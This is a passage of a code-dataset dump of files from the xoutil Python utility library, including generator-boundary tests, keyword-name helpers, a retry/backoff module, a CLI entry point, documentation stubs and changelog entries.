mod.__file__.startswith(path):\n res = python_version\n return res\n\n\nclass PackageVersion(ThreeNumbersVersion):\n \"\"\"Current Package version.\n\n Extra components (besides 'major', 'minor', and 'micro') are:\n 'releaselevel' (a string that could be 'alpha', 'beta', 'candidate', or\n 'final'), and 'serial' (an integer). The attribute 'pypy' could be used\n to determine if this is a PyPy instance or not.\n\n \"\"\"\n\n def __new__(cls, package_name):\n info = cls._find_version(package_name)\n if info:\n return super().__new__(cls, info)\n else:\n msg = \"{}() could not determine a valid version\"\n raise ValueError(msg.format(cls.__name__))\n\n @staticmethod\n def _find_version(package_name):\n from pkg_resources import get_distribution, ResolutionError\n\n if package_name in (\"__builtin__\", \"builtins\"):\n return python_version\n else:\n res = None\n while not res and package_name:\n try:\n dist = get_distribution(package_name)\n try:\n res = dist.parsed_version.base_version\n except AttributeError:\n res = dist.version\n except ResolutionError:\n from importlib import import_module\n\n try:\n mod = import_module(\".\".join((package_name, \"release\")))\n res = _get_mod_version(mod)\n except ImportError:\n try:\n mod = import_module(package_name)\n res = _get_mod_version(mod)\n except ImportError:\n mod = __import__(package_name)\n res = _get_mod_version(mod)\n if not res:\n aux = package_name.rsplit(\".\", 1)\n package_name = aux[0] if len(aux) > 1 else \"\"\n return res\n" }, { "alpha_fraction": 0.48906639218330383, "alphanum_fraction": 0.5193210244178772, "avg_line_length": 26.363388061523438, "blob_id": "d3b5817b4e451067e3d3e852129b93d2b0316819", "content_id": "a4148e6d7027942ec2ba1fff277e19b84c3ee7e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10016, "license_type": "no_license", "max_line_length": 77, "num_lines": 366, "path": "/tests/test_bound.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nfrom xoutil.bound import boundary, whenall, whenany\n\n\ndef fibonacci(wait=None):\n import time\n\n a, b = 1, 1\n while True:\n if wait:\n time.sleep(wait)\n yield a\n a, b = b, a + b\n\n\nclass TestBoundedWithStandardPredicates(unittest.TestCase):\n def test_times(self):\n from xoutil.bound import times, until\n\n fib8 = times(8)(fibonacci)\n # Fibonacci numbers are yielded:\n # 1 1 2 3 5 8 13 21\n self.assertEqual(fib8(), 21)\n\n fib8 = until(times=8)(fibonacci)\n # Fibonacci numbers are yielded:\n # 1 1 2 3 5 8 13 21\n self.assertEqual(fib8(), 21)\n\n fib8 = times(8)(fibonacci)\n\n fib8gen = fib8.generate() # exposed bounded generator\n self.assertEqual(tuple(fib8gen), (1, 1, 2, 3, 5, 8, 13, 21))\n\n def test_until_error(self):\n from xoutil.bound import until\n\n d = dict(a=1, b=2, c=3, d=4)\n\n @until(errors=(KeyError,))\n def getall(d, *keys):\n for k in keys:\n yield d[k]\n\n assert d[\"d\"] == getall(d, \"a\", \"b\", \"d\")\n assert d[\"a\"] == getall(d, \"a\", \"kkk\")\n\n @until(errors=(ValueError,))\n def getall(d, *keys):\n for k in keys:\n yield d[k]\n\n with self.assertRaises(KeyError):\n getall(d, \"kkk\")\n\n @until(errors=(RuntimeError,))\n def failing():\n raise RuntimeError\n yield 1\n\n assert failing() is None\n assert list(failing.generate()) == []\n\n def test_timed(self):\n from xoutil.bound import timed, until\n\n fib10ms = timed(1 / 100)(fibonacci)\n # Since the wait time below will be larger than the allowed execution\n # (10 ms) fib1ms will only be able to yield a single value (notice\n # that `timed` always allow a cycle.)\n res = fib10ms(wait=1 / 10)\n self.assertEqual(res, 1)\n\n fib10ms = until(maxtime=1 / 100)(fibonacci)\n # Since the wait time below will be larger than the allowed execution\n # (10 ms) fib1ms will only be able to yield a single value (notice\n # that `timed` always allow a cycle.)\n res = fib10ms(wait=1 / 10)\n self.assertEqual(res, 1)\n\n # If the time boundary is too low timed will allow not allow a cycle.\n fib0ms = timed(0)(fibonacci)\n res = fib0ms()\n self.assertEqual(res, None)\n\n def test_accumulated(self):\n from xoutil.bound import until\n from xoutil.bound import accumulated, timed, times\n\n # 1 + 1 + 2 + 3 + 5 + 8 + 13 + 21 + 34 + 55 + 89 + 144 = 376\n # ^ ^ ... ^\n # | | ... |\n # 1 2 3 4 5 6 7 8 9 10 11 12 13\n # | | ... | |\n # V V ... V V\n # 1 + 1 + 2 + 3 + 5 + 8 + 13 + 21 + 34 + 55 + 89 + 144 + 233 = 609\n fib500 = accumulated(500)(fibonacci)\n self.assertEqual(fib500(), 233)\n fib500 = until(accumulate=500)(fibonacci)\n self.assertEqual(fib500(), 233)\n\n fib500timed = whenall(accumulated(500), timed(0))(fibonacci)\n self.assertEqual(fib500timed(), 233)\n\n self.assertEqual(\n tuple(fib500.generate()),\n (1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233),\n )\n\n # With .generate() you may count\n self.assertEqual(len(tuple(fib500.generate())), 13) # the 13th\n\n # Since 500 is reached at the 13th fib number, looping up to the 20th\n # number must be bigger.\n fib500at20 = whenall(accumulated(500), times(20))(fibonacci)\n self.assertGreater(fib500at20(), 233)\n\n\nclass TestBoundaryDefinitions(unittest.TestCase):\n def test_argless_boundary(self):\n @boundary\n def argless():\n yield False # receive args\n yield False # allow first yield\n yield True\n\n # the following simulates:\n # @argless\n # def fibonacci():\n # ....\n fib2 = argless(fibonacci)\n self.assertEqual(fib2(), 1)\n\n\nclass TestHigherLevelPreds(unittest.TestCase):\n def test_close_is_always_called(self):\n @boundary\n def bailout():\n yield\n try:\n yield False\n yield True\n except GeneratorExit:\n pass\n else:\n raise AssertionError(\"close() must have been called\")\n\n fibnone = whenall(whenany(bailout))(fibonacci)\n self.assertEqual(fibnone(), 1)\n\n def test_whenall_with_invalid(self):\n from xoutil.bound import times\n\n @boundary\n def invalid():\n yield\n\n fibinv = whenall(invalid, times(10))(fibonacci)\n with self.assertRaises(RuntimeError):\n fibinv()\n\n def test_whenall_with_invalid_befored_terminated(self):\n from xoutil.bound import times\n\n @boundary\n def invalid():\n yield\n yield False\n\n fibinv = whenall(invalid, times(10))(fibonacci)\n with self.assertRaises(RuntimeError):\n fibinv()\n\n\nclass TestBoundedUnnamedPredicates(unittest.TestCase):\n def test_atmost_unnamed(self):\n from xoutil.bound import times\n\n fib8 = times(8)(fibonacci)\n # Fibonacci numbers are yielded:\n # 1 1 2 3 5 8 13 21\n self.assertEqual(fib8(), 21)\n\n def test_invalid_unnamed(self):\n @boundary\n def invalid():\n return 1\n\n @invalid\n def foobar():\n while True:\n yield\n\n with self.assertRaises(TypeError):\n foobar()\n\n @boundary\n def invalid_init():\n yield\n\n @invalid_init\n def foobar2():\n while True:\n yield\n\n with self.assertRaises(RuntimeError):\n foobar2()\n\n\nclass TestBoundedPredicates(unittest.TestCase):\n def test_invalid_predicate_early_at_init(self):\n @boundary\n def invalid():\n yield\n\n @invalid\n def foobar():\n pass\n\n with self.assertRaises(RuntimeError):\n foobar()\n\n def test_invalid_predicate_early_at_cycle(self):\n @boundary\n def invalid():\n yield\n yield False # i.e never signal True\n\n @invalid\n def foobar():\n passes, atmost = 0, 10\n while passes < atmost:\n yield passes\n passes += 1\n raise AssertionError(\n \"Invalid reach point a GeneratorExit was \" \"expected.\"\n )\n\n with self.assertRaises(RuntimeError):\n foobar()\n\n\nclass TestMisc(unittest.TestCase):\n def test_args_are_passed(self):\n @boundary\n def pred():\n args, kwargs = yield\n self.assertEqual(args, (1, 2))\n self.assertEqual(kwargs, {})\n yield True\n\n @pred\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2)\n\n def test_whens_receives_args(self):\n from xoutil.bound import whenall, whenany\n\n self.assertTrue(whenall.receive_args)\n self.assertTrue(whenany.receive_args)\n\n def test_args_are_passed_to_all(self):\n from xoutil.bound import whenall, whenany\n\n @boundary\n def pred():\n args, kwargs = yield\n self.assertEqual(args, (1, 2))\n self.assertEqual(kwargs, {\"egg\": \"ham\"})\n yield True\n\n @whenall(pred, pred())\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2, egg=\"ham\")\n\n @whenany(pred(), pred)\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2, egg=\"ham\")\n\n def test_needs_args(self):\n from xoutil.bound import times\n\n @whenall(times)\n def foobar():\n yield\n\n with self.assertRaises(TypeError):\n foobar() # times is not initialized\n\n def test_plain_function(self):\n def pred():\n args, kwargs = yield\n self.assertEqual(args, (1, 2))\n self.assertEqual(kwargs, {\"egg\": \"ham\"})\n yield True\n\n @whenall(pred)\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2, egg=\"ham\")\n\n def test_generators(self):\n def pred():\n args, kwargs = yield\n self.assertEqual(args, (1, 2))\n self.assertEqual(kwargs, {\"egg\": \"ham\"})\n yield True\n\n @whenall(pred()) # a generator!!\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2, egg=\"ham\")\n\n def test_plain_generator(self):\n from xoutil.bound import times\n\n fibseq = fibonacci()\n limited = times(5)(fibseq)\n self.assertEqual(limited(), 5)\n\n\nclass TestTerminationCases(unittest.TestCase):\n def test_termination_when_exception(self):\n def magic_number(a):\n if a < 1:\n yield 0\n else:\n prev = next(magic_number(a - 1))\n yield a + prev\n\n @boundary\n def forever():\n try:\n while True:\n yield False\n except GeneratorExit:\n pass # ok\n else:\n raise AssertionError(\"close() not called to boundary\")\n\n bounded = forever()(magic_number)\n bounded(0) # No exception\n with self.assertRaises(TypeError):\n bounded(\"invalid\")\n" }, { "alpha_fraction": 0.5364705920219421, "alphanum_fraction": 0.5458823442459106, "avg_line_length": 27.33333396911621, "blob_id": "2461bd24dd382314ed3b187edd5e7e526dd680d6", "content_id": "9ddd512f08cbe69d1237da46f46276b49de8ee7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 72, "num_lines": 15, "path": "/tests/test_pprint.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\ndef test_ppformat_rtype():\n from xoutil.future.pprint import ppformat\n\n o = [list(range(i + 1)) for i in range(10)]\n assert type(ppformat(o)) is str\n" }, { "alpha_fraction": 0.6471264362335205, "alphanum_fraction": 0.6482758522033691, "avg_line_length": 23.85714340209961, "blob_id": "2a9345f59cbe2e2a150036b5d49e2543543c169f", "content_id": "15ecc68e3e3109b4704fbf53e48d7adff2fa5e51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 76, "num_lines": 70, "path": "/xotl/tools/keywords.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tools for manage Python keywords as names.\n\nReserved Python keywords can't be used as attribute names, so this module\nfunctions use the convention of rename the name using an underscore as\nsuffix when a reserved keyword is used as name.\n\n\"\"\"\n\n\ndef suffix_kwd(name):\n \"\"\"Add an underscore suffix if name if a Python keyword.\"\"\"\n from keyword import iskeyword\n\n return \"{}_\".format(name) if iskeyword(name) else name\n\n\ndef org_kwd(name):\n \"\"\"Remove the underscore suffix if name starts with a Python keyword.\"\"\"\n from keyword import iskeyword\n\n if name.endswith(\"_\"):\n res = name[:-1]\n return res if iskeyword(res) else name\n else:\n return name\n\n\ndef getkwd(obj, name, default=None):\n \"\"\"Like `getattr` but taking into account Python keywords.\"\"\"\n return getattr(obj, suffix_kwd(name), default)\n\n\ndef setkwd(obj, name, value):\n \"\"\"Like `setattr` but taking into account Python keywords.\"\"\"\n setattr(obj, suffix_kwd(name), value)\n\n\ndef delkwd(obj, name):\n \"\"\"Like `delattr` but taking into account Python keywords.\"\"\"\n delattr(obj, suffix_kwd(name))\n\n\ndef kwd_getter(obj):\n \"\"\"partial(getkwd, obj)\"\"\"\n from functools import partial\n\n return partial(getkwd, obj)\n\n\ndef kwd_setter(obj):\n \"\"\"partial(setkwd, obj)\"\"\"\n from functools import partial\n\n return partial(setkwd, obj)\n\n\ndef kwd_deleter(obj):\n \"\"\"partial(delkwd, obj)\"\"\"\n from functools import partial\n\n return partial(delkwd, obj)\n" }, { "alpha_fraction": 0.5486425161361694, "alphanum_fraction": 0.5531674027442932, "avg_line_length": 22.891891479492188, "blob_id": "36891d013a1023c0c7a45ebd3a3943b7cf04b1ac", "content_id": "a4ed380300c2d1cb67667b319436406373ad3f70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 72, "num_lines": 37, "path": "/tests/test_tools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\ndef test_nameof():\n from xoutil.tools import nameof\n\n class foobar:\n pass\n\n singletons = (None, True, False, Ellipsis, NotImplemented)\n\n assert nameof(foobar) == nameof(foobar()) == \"foobar\"\n assert nameof(object) == \"object\"\n assert nameof(test_nameof) == \"test_nameof\"\n\n assert nameof(lambda x: x) == \"<lambda>\"\n\n assert [nameof(s) for s in singletons] == [\n \"None\",\n \"True\",\n \"False\",\n \"Ellipsis\",\n \"NotImplemented\",\n ]\n\n assert nameof(1) == \"int\"\n assert nameof(1.0) == \"float\"\n\n\n# TODO: Add tests for remainder functions in this module.\n" }, { "alpha_fraction": 0.46315789222717285, "alphanum_fraction": 0.46315789222717285, "avg_line_length": 37, "blob_id": "7bb8d9f3e0cbb5de8b78f1f943e3796e42570954", "content_id": "91b32d67ac330037cf78fc922006931fadc2a9c6", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 190, "license_type": "permissive", "max_line_length": 69, "num_lines": 5, "path": "/docs/source/xotl.tools/cpystack.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.cpystack`:mod: - Utilities to inspect the CPython's stack\n=====================================================================\n\n.. automodule:: xotl.tools.cpystack\n :members:\n" }, { "alpha_fraction": 0.5278350710868835, "alphanum_fraction": 0.5340206027030945, "avg_line_length": 21.045454025268555, "blob_id": "08338d53c4990804c91fc0796ae3811de2a3e07d", "content_id": "cea840c8276de946c9e72758f4f7fc12bdeb1971", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 485, "license_type": "permissive", "max_line_length": 75, "num_lines": 22, "path": "/docs/source/xotl.tools/testing.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "================================================\n `xotl.tools.testing`:mod: -- Utilities testing\n================================================\n\n.. module:: xotl.tools.testing\n\nProvides `sample data generators`__ for xotl.tools's data structures.\n\n.. warning:: You must install ``xotl.tools[testing]`` in order to get extra\n dependencies.\n\n.. versionadded:: 1.8.2\n\n\n__ hypothesis_\n.. _hypothesis: https://hypothesis.readthedocs.io/\n\n\n.. toctree::\n :glob:\n\n testing/*\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7637614607810974, "avg_line_length": 38.6363639831543, "blob_id": "16d6404a68823cfb8991708becb2bcf0306cb4c0", "content_id": "00a3ec73f54ec8910c073af81bc7cf8e73860e73", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1308, "license_type": "permissive", "max_line_length": 78, "num_lines": 33, "path": "/docs/source/history/_changes-1.5.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- UserList are now collections in the sense of\n `xoutil.types.is_collection`:func:.\n\n- Python 3.4 added to the list of tested Python environments. Notice this\n does not makes any warrants about identical behavior of things that were\n previously backported from Python 3.3.\n\n For instance, the `xoutil.collections.ChainMap`:class: has been already\n backported from Python 3.4, so it will have the same signature and behavior\n across all supported Python versions.\n\n But other new things in Python 3.4 are not yet backported to xoutil.\n\n- Now `xoutil.objects.metaclass`:func: supports the ``__prepare__``\n classmethod of metaclasses. This is fully supported in Python 3.0+ and\n partially mocked in Python 2.7.\n\n- Backported `xoutil.types.MappingProxyType`:class: from Python 3.3.\n\n- Backported `xoutil.types.SimpleNamespace`:class: from Python 3.4.\n\n- Backported `xoutil.types.DynamicClassAttribute`:class: from Python 3.4\n\n- Added function `xoutil.iterators.delete_duplicates`:func:.\n\n- Added parameter `ignore_underscore` to `xoutil.string.normalize_slug`:func:.\n\n- Added module `xoutil.crypto`:mod: with a function for generating passwords.\n\n- Fixed several bug in `xoutil.functools.compose`:func:.\n\n- Makes `xoutil.fs.path.rtrim`:func: have a default value for the amount of\n step to traverse.\n" }, { "alpha_fraction": 0.7509340047836304, "alphanum_fraction": 0.7509340047836304, "avg_line_length": 39.150001525878906, "blob_id": "632801d69781fac03960f460697dc210a99318f9", "content_id": "03e5d50c3312cf9056e5a21f46646f3311332633", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 803, "license_type": "permissive", "max_line_length": 78, "num_lines": 20, "path": "/docs/source/history/changes-1.4.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Adds `xoutil.datetime.daterange`:func:.\n\n- Adds `xoutil.objects.traverse`:func:.\n\n- Adds `xoutil.fs.makedirs`:func: and `xoutil.fs.ensure_filename`:func:.\n\n- The `fill` argument in function `xoutil.iterators.slides`:func: now defaults\n to None. This is consistent with the intended usage of\n `~xoutil.Unset`:class: and with the semantics of both\n `xoutil.iterators.continuously_slides`:func: and\n `xoutil.iterators.first_n`:func:.\n\n Unset, as a default value for parameters, is meant to signify the absence\n of an argument and thus only would be valid if an absent argument had some\n kind of effect *different* from passing the argument.\n\n- Changes `xoutil.modules.customize`:func: API to separate options from\n custom attributes.\n\n- Includes a `random` parameter to `xoutil.uuid.uuid`:func:.\n" }, { "alpha_fraction": 0.7035040259361267, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 29.91666603088379, "blob_id": "938982d7570c1fb5ff78825bb7871be50bbc8b97", "content_id": "0d61e2350683e387ee727d2435f0d491e57e71b0", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 371, "license_type": "permissive", "max_line_length": 75, "num_lines": 12, "path": "/docs/source/history/_changes-1.9.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add support for Python 3.7.\n\n- ``xoutil.eight.abc.ABC`` is an alias to the stdlib's `ABC` class if using\n Python 3.4+.\n\n- Rename ``xoutil.fp.iterators.iter_compose`` to\n `xoutil.fp.iterators.kleisli_compose`:func:. Leave ``iter_compose`` as\n deprecated alias.\n\n- Add `xoutil.future.datetime.TimeSpan.diff`:meth:\n\n- Add `xoutil.future.datetime.DateTimeSpan`:class:.\n" }, { "alpha_fraction": 0.7052313685417175, "alphanum_fraction": 0.7082495093345642, "avg_line_length": 38.7599983215332, "blob_id": "ae3dbe6185d2199b35145bfe311fea3b05b404e0", "content_id": "3ca3c16dcb4ed47aa6d2723631647df458dfd9ee", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 994, "license_type": "permissive", "max_line_length": 79, "num_lines": 25, "path": "/docs/source/history/_changes-1.5.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Lots of removals. Practically all deprecated since 1.4.0 (or before). Let's\n list a few but not all:\n\n - Both `xoutil.Unset`:obj: and `xoutil.Ignored`:obj: are no longer\n re-exported in `xoutil.types`:mod:.\n\n - Removes module `!xoutil.decorator.compat`:mod:, since it only contained the\n deprecated decorator `!xoutil.decorator.compat.metaclass`:func: in favor of\n `xoutil.objects.metaclass`:func:.\n\n - Removes ``nameof`` and ``full_nameof`` from `xoutil.objects`:mod: in favor\n of `xoutil.names.nameof`:func:.\n\n - Removes ``pow_`` alias of `xoutil.functools.power`:func:.\n\n - Removes the deprecated ``xoutil.decorator.decorator`` function. Use\n `xoutil.decorator.meta.decorator`:func: instead.\n\n - Now `~xoutil.modules.get_module_path`:func: is documented and in module\n `xoutil.modules`:mod:.\n\n- Also we have documented a few more functions, including\n `xoutil.fs.path.rtrim`:func:.\n\n- All modules below `!xoutil.aop`:mod: are in risk and are being deprecated.\n" }, { "alpha_fraction": 0.5883951783180237, "alphanum_fraction": 0.5968202352523804, "avg_line_length": 26.769811630249023, "blob_id": "ac0805ecfee5b93c08934be5192644e546c47e8e", "content_id": "8a182bba7653e94e2266eb101cf560a9d12395b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7360, "license_type": "no_license", "max_line_length": 88, "num_lines": 265, "path": "/xotl/tools/tasking/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Task, multitasking, and concurrent programming tools.\n\n.. warning:: Experimental. API is not settled.\n\n.. versionadded:: 1.8.0\n\n\"\"\"\n\nimport sys\nfrom xotl.tools.deprecation import deprecated_alias\n\n\n# TODO: Must be implemented using `xotl.tools.api` mechanisms for correct\n# driver determination, in this case \"thread-local data\".\nif \"greenlet\" in sys.modules:\n from ._greenlet_local import local # noqa\nelse:\n try:\n from threading import local # noqa\n except ImportError:\n from dummy_threading import local # noqa\n\ndel sys\n\n\nclass AutoLocal(local):\n \"\"\"Initialize thread-safe local data in one shoot.\n\n Typical use is::\n\n >>> from xotl.tools.tasking import AutoLocal\n >>> context = AutoLocal(cause=None, traceback=None)\n\n When at least one attribute is given, ``del AutoLocal`` it's executed\n automatically avoiding this common statement at the end of your module.\n\n \"\"\"\n\n def __init__(self, **attrs):\n import sys\n\n super().__init__()\n for attr in attrs:\n setattr(self, attr, attrs[attr])\n if attrs:\n g = sys._getframe(1).f_globals\n tname = type(self).__name__\n if tname in g:\n del g[tname]\n\n\n#: The minimal time (in seconds) to wait between retries.\n#:\n#: .. versionadded:: 1.8.2\nMIN_WAIT_INTERVAL = 20 / 1000 # 20 ms\n\n#: The default time (in seconds) to wait between retries.\n#:\n#: .. versionadded:: 1.8.2\nDEFAULT_WAIT_INTERVAL = 50 / 1000 # 50 ms\n\n\nclass ConstantWait:\n \"\"\"A constant wait algorithm.\n\n Instances are callables that comply with the need of the `wait` argument\n for `retrier`:class:. This callable always return the same `wait` value.\n\n We never wait less than `MIN_WAIT_INTERVAL`:data:.\n\n .. versionadded:: 1.8.2\n\n .. versionchanged:: 1.9.1 Renamed; it was ``StandardWait``. The old name\n is kept as a deprecated alias.\n\n .. versionchanged:: 2.0.1 Renamed; it was ``StandardWait``. The old name\n is kept as a deprecated alias.\n\n \"\"\"\n\n def __init__(self, wait=DEFAULT_WAIT_INTERVAL):\n import numbers\n\n if not isinstance(wait, numbers.Real):\n raise TypeError(\"'wait' must a number.\")\n self.wait = max(MIN_WAIT_INTERVAL, wait)\n\n def __call__(self, prev=None):\n return self.wait\n\n\nStandardWait = deprecated_alias(\n ConstantWait, msg=\"StandardWait is deprecated. Use ConstantWait instead\"\n)\n\n\nclass BackoffWait:\n \"\"\"A wait algorithm with an exponential backoff.\n\n Instances are callables that comply with the need of the `wait` argument\n for `retrier`:class:.\n\n At each call the wait is increased by doubling `backoff` (given in\n milliseconds).\n\n We never wait less than `MIN_WAIT_INTERVAL`:data:.\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n\n def __init__(self, wait=DEFAULT_WAIT_INTERVAL, backoff=1):\n self.wait = max(MIN_WAIT_INTERVAL, wait)\n self.backoff = min(max(0.1, backoff), 1)\n\n def __call__(self, prev=None):\n res = self.wait + (self.backoff / 1000)\n self.backoff = self.backoff * 2\n return res\n\n\ndef get_backoff_wait(n, *, wait=DEFAULT_WAIT_INTERVAL, backoff=1):\n \"\"\"Compute the total backoff wait time after `n` tries.\n\n .. seealso:: `BackoffWait`:class:.\n\n .. versionadded:: 2.1.0\n\n \"\"\"\n res = 0\n fn = BackoffWait(wait=wait, backoff=backoff)\n for _ in range(n):\n res = fn(prev=res)\n return res\n\n\ndef retry(\n fn,\n args=None,\n kwargs=None,\n *,\n max_tries=None,\n max_time=None,\n wait=DEFAULT_WAIT_INTERVAL,\n retry_only=None\n):\n \"\"\"Run `fn` with args and kwargs in an auto-retrying loop.\n\n See `retrier`:class:. This is just::\n\n >>> retrier(max_tries=max_tries, max_time=max_time, wait=wait,\n ... retry_only=retry_only)(fn, *args, **kwargs)\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n if args is None:\n args = ()\n if kwargs is None:\n kwargs = {}\n return retrier(\n max_tries=max_tries, max_time=max_time, wait=wait, retry_only=retry_only\n )(fn, *args, **kwargs)\n\n\nclass retrier:\n \"\"\"An auto-retrying dispatcher.\n\n A retrier it's a callable that takes another callable (`func`) and its\n arguments and runs it in an auto-retrying loop.\n\n If `func` raises any exception that is in `retry_only`, and it has being\n tried less than `max_tries` and the time spent executing the function\n (waiting included) has not reached `max_time`, the function will be\n retried.\n\n `wait` can be a callable or a number. If `wait` is callable, it must take\n a single argument with the previous waiting we did (`None`:data: for the\n first retry) and return the number of seconds to wait before retrying.\n\n If `wait` is a number, we convert it to a callable with\n `ConstantWait(wait) <ConstantWait>`:class:.\n\n .. seealso:: `BackoffWait`:class:\n\n If `retry_only` is None, all exceptions (that inherits from Exception)\n will be retried. Otherwise, only the exceptions in `retry_only` will be\n retried.\n\n Waiting is done with `time.sleep`:func:. Time tracking is done with\n `time.monotonic`:func:.\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n\n def __init__(\n self, max_tries=None, max_time=None, wait=DEFAULT_WAIT_INTERVAL, retry_only=None\n ):\n if not max_tries and not max_time:\n raise TypeError(\"One of tries or times must be set\")\n self.max_tries = max_tries\n self.max_time = max_time\n if not callable(wait):\n self.wait = ConstantWait(wait)\n else:\n self.wait = wait\n if not retry_only:\n self.retry_only = (Exception,)\n else:\n self.retry_only = retry_only\n\n def __call__(self, fn, *args, **kwargs):\n return self.decorate(fn)(*args, **kwargs)\n\n def decorate(self, fn):\n \"\"\"Return `fn` decorated to run in an auto-retry loop.\n\n You can use this to decorate a function you'll always run inside a\n retrying loop:\n\n >>> @retrier(max_tries=5, retry_only=TransientError).decorate\n ... def read_from_url(url):\n ... pass\n\n \"\"\"\n from time import monotonic as clock, sleep\n from xotl.tools.future.functools import wraps\n\n max_time = self.max_time\n max_tries = self.max_tries\n\n @wraps(fn)\n def inner(*args, **kwargs):\n t = 0\n done = False\n start = clock()\n waited = None\n while not done:\n try:\n return fn(*args, **kwargs)\n except self.retry_only:\n t += 1\n reached_max_tries = max_tries and t >= max_tries\n max_time_elapsed = max_time and clock() - start >= max_time\n retry = not reached_max_tries and not max_time_elapsed\n if retry:\n waited = self.wait(waited)\n sleep(waited)\n else:\n raise\n\n return inner\n\n\ndel deprecated_alias\n" }, { "alpha_fraction": 0.5715555548667908, "alphanum_fraction": 0.5759999752044678, "avg_line_length": 24.56818199157715, "blob_id": "a8b978c616453fed89f23ba673f9a47d63fb8a66", "content_id": "6f6cec96455616d446439592200a532c11dc38b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1126, "license_type": "no_license", "max_line_length": 87, "num_lines": 44, "path": "/xotl/tools/cli/app.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"A simple `main`:func: entry point for CLI based applications.\n\nThis module provides an example of how to use `xotl.tools.cli`:mod: to create a\nCLI application.\n\n\"\"\"\n\n\ndef main(default=None):\n \"\"\"Execute a command.\n\n It can be given as the first program argument or it's the `default`\n command is defined.\n\n \"\"\"\n import sys\n from xotl.tools.cli import Command, HELP_NAME\n\n args = sys.argv[1:]\n if args and not args[0].startswith(\"-\"):\n cmd_name = args[0]\n args = args[1:]\n else:\n cmd_name = default or Command.get_setting(\"default_command\", None) or HELP_NAME\n cmds = Command.registry\n cmd = cmds.get(cmd_name)\n if not cmd:\n print('Command \"%s\" not found!\\n' % cmd_name)\n cmd = cmds.get(HELP_NAME)\n args = []\n sys.exit(cmd().run(args))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.48057207465171814, "alphanum_fraction": 0.5087752342224121, "avg_line_length": 34.697288513183594, "blob_id": "8a298a1778f96a0dd941b3224023eb830f20235d", "content_id": 